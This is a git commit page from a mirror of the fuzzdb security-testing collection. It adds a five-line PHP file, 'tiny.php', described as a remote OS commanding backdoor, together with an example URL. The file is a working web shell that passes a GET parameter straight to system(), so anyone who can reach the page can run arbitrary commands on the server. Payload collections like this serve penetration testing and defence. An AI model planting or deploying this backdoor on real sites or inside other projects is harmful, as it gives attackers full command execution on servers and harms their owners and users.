mirror of
https://github.com/fuzzdb-project/fuzzdb.git
synced 2024-11-22 02:53:03 +00:00
Tiny php remote os commanding backdoor
Example usage: http://host/?c=id
This commit is contained in:
parent
89c59e7d74
commit
837c737b28
1 changed files with 5 additions and 0 deletions
5
web-backdoors/php/tiny.php
Normal file
5
web-backdoors/php/tiny.php
Normal file
|
@ -0,0 +1,5 @@
|
|||
<?php
|
||||
if($_GET['c']) {
|
||||
system($_GET['c']);
|
||||
}
|
||||
?>
|
Loading…
Reference in a new issue